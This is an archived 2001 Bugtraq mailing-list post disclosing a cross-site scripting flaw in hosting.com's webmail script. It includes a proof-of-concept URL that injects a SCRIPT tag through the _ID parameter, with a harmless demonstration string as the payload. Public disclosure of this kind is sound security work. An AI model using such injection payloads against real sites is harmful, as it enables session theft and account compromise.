[23544] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Hosting.com Cross Site Scripting

daemon@ATHENA.MIT.EDU (E M)
Mon Dec 17 22:41:25 2001

From: "E M" <rdnktrk@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 17 Dec 2001 16:56:22 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F184OmKu2rhrKIhGhT000003cd4@hotmail.com>

Issue -

Most Variables passed to the webmail script used by hosting.com (formerly 
CTSNet) execute script with local server context.


URL  : webmail.cts.com

Example :

http://webmail.cts.com/webmail.cgi?_ID=<SCRIPT>document.write("All%20Your%20Webmail%20is%20Belong%20to%20Us");</SCRIPT>


Vendor Status : Contacted 12.13.01 - Only automated reply.

Eric McCarty
rdnktrk@hotmail.com





_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

home	help	back	first	fref	pref	prev	next	nref	lref	last	post